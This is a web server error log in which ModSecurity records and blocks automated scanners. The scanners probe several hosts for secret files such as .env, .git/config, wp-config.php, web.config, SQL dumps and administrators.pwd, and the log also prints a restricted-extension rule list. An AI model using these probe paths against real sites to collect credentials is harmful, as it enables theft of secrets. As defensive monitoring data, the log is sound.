[Sun Nov 17 23:56:43.429753 2024] [:error] [pid 3386431] [client 179.43.189.138:55866] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /env/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm8AAAAAg"]
[Sun Nov 17 23:56:43.430031 2024] [:error] [pid 3386431] [client 179.43.189.138:55866] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm8AAAAAg"]
[Sun Nov 17 23:56:43.430281 2024] [:error] [pid 3386431] [client 179.43.189.138:55866] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm8AAAAAg"]
[Mon Nov 18 02:13:06.061339 2024] [:error] [pid 3387185] [client 45.148.10.245:36888] [client 45.148.10.245] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzqUoq3JlcCKKCKcWp3o9gAAAAc"]
[Mon Nov 18 02:13:06.061970 2024] [:error] [pid 3387185] [client 45.148.10.245:36888] [client 45.148.10.245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzqUoq3JlcCKKCKcWp3o9gAAAAc"]
[Mon Nov 18 02:13:06.062620 2024] [:error] [pid 3387185] [client 45.148.10.245:36888] [client 45.148.10.245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzqUoq3JlcCKKCKcWp3o9gAAAAc"]
[Mon Nov 18 15:24:19.851065 2024] [:error] [pid 3390889] [client 216.245.184.125:60270] [client 216.245.184.125] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZztOE7rd3yrSwoQ3D9wUvwAAAAE"]
[Mon Nov 18 15:24:19.851902 2024] [:error] [pid 3390889] [client 216.245.184.125:60270] [client 216.245.184.125] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZztOE7rd3yrSwoQ3D9wUvwAAAAE"]
[Mon Nov 18 15:24:19.852430 2024] [:error] [pid 3390889] [client 216.245.184.125:60270] [client 216.245.184.125] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZztOE7rd3yrSwoQ3D9wUvwAAAAE"]
[Tue Nov 19 01:18:26.343569 2024] [authz_core:error] [pid 3410973] [client 207.154.212.47:48948] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 19 01:18:27.304733 2024] [:error] [pid 3411015] [client 207.154.212.47:48976] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZzvZU0eBWkqhU8ZTEfAD7QAAAAQ"]
[Tue Nov 19 01:18:27.305075 2024] [:error] [pid 3411015] [client 207.154.212.47:48976] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZzvZU0eBWkqhU8ZTEfAD7QAAAAQ"]
[Tue Nov 19 01:18:27.305399 2024] [:error] [pid 3411015] [client 207.154.212.47:48976] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZzvZU0eBWkqhU8ZTEfAD7QAAAAQ"]
[Tue Nov 19 01:18:27.356070 2024] [:error] [pid 3410972] [client 207.154.212.47:48978] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzvZUyU3VGvFJA5cH0eusQAAAAM"]
[Tue Nov 19 01:18:27.356294 2024] [:error] [pid 3410972] [client 207.154.212.47:48978] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzvZUyU3VGvFJA5cH0eusQAAAAM"]
[Tue Nov 19 01:18:27.356507 2024] [:error] [pid 3410972] [client 207.154.212.47:48978] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzvZUyU3VGvFJA5cH0eusQAAAAM"]
[Tue Nov 19 01:18:27.409272 2024] [:error] [pid 3411017] [client 207.154.212.47:48990] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZzvZU1r55UObZy2A3Ot76AAAAAg"]
[Tue Nov 19 01:18:27.409765 2024] [:error] [pid 3411017] [client 207.154.212.47:48990] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZzvZU1r55UObZy2A3Ot76AAAAAg"]
[Tue Nov 19 01:18:27.410182 2024] [:error] [pid 3411017] [client 207.154.212.47:48990] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZzvZU1r55UObZy2A3Ot76AAAAAg"]
[Tue Nov 19 02:14:38.397408 2024] [:error] [pid 3410974] [client 213.232.87.228:33231] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXggAAAAY"]
[Tue Nov 19 02:14:38.397836 2024] [:error] [pid 3410974] [client 213.232.87.228:33231] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXggAAAAY"]
[Tue Nov 19 02:14:38.398382 2024] [:error] [pid 3410974] [client 213.232.87.228:33231] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXggAAAAY"]
[Tue Nov 19 02:14:38.398868 2024] [:error] [pid 3410974] [client 213.232.87.228:33231] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXggAAAAY"]
[Tue Nov 19 02:14:38.399335 2024] [:error] [pid 3411013] [client 213.232.87.228:3003] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZzvmfmrT1ZS875CeJzeB_AAAAAA"]
[Tue Nov 19 02:14:38.399776 2024] [:error] [pid 3411013] [client 213.232.87.228:3003] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZzvmfmrT1ZS875CeJzeB_AAAAAA"]
[Tue Nov 19 02:14:38.400156 2024] [:error] [pid 3411013] [client 213.232.87.228:3003] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZzvmfmrT1ZS875CeJzeB_AAAAAA"]
[Tue Nov 19 02:14:38.406272 2024] [authz_core:error] [pid 3410973] [client 213.232.87.228:40121] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 19 02:14:38.408458 2024] [:error] [pid 3411018] [client 213.232.87.228:65325] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "Zzvmfn9RIEz-Md7tNdmrIgAAAAo"]
[Tue Nov 19 02:14:38.408683 2024] [:error] [pid 3411018] [client 213.232.87.228:65325] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "Zzvmfn9RIEz-Md7tNdmrIgAAAAo"]
[Tue Nov 19 02:14:38.408875 2024] [:error] [pid 3411018] [client 213.232.87.228:65325] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "Zzvmfn9RIEz-Md7tNdmrIgAAAAo"]
[Tue Nov 19 02:14:38.411219 2024] [:error] [pid 3411014] [client 213.232.87.228:54885] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "ZzvmfkfpWewSP51rP127ugAAAAE"]
[Tue Nov 19 02:14:38.411508 2024] [:error] [pid 3411014] [client 213.232.87.228:54885] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "ZzvmfkfpWewSP51rP127ugAAAAE"]
[Tue Nov 19 02:14:38.411673 2024] [:error] [pid 3411014] [client 213.232.87.228:54885] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "ZzvmfkfpWewSP51rP127ugAAAAE"]
[Tue Nov 19 02:14:38.414391 2024] [:error] [pid 3411017] [client 213.232.87.228:53023] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zzvmflr55UObZy2A3Ot77AAAAAg"]
[Tue Nov 19 02:14:38.414664 2024] [:error] [pid 3411017] [client 213.232.87.228:53023] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zzvmflr55UObZy2A3Ot77AAAAAg"]
[Tue Nov 19 02:14:38.414837 2024] [:error] [pid 3411017] [client 213.232.87.228:53023] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zzvmflr55UObZy2A3Ot77AAAAAg"]
[Tue Nov 19 02:14:38.507339 2024] [:error] [pid 3410973] [client 213.232.87.228:4877] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "ZzvmfidN2WwgKminFuNytQAAAAU"]
[Tue Nov 19 02:14:38.507628 2024] [:error] [pid 3410973] [client 213.232.87.228:4877] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "ZzvmfidN2WwgKminFuNytQAAAAU"]
[Tue Nov 19 02:14:38.507780 2024] [:error] [pid 3410973] [client 213.232.87.228:4877] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "ZzvmfidN2WwgKminFuNytQAAAAU"]
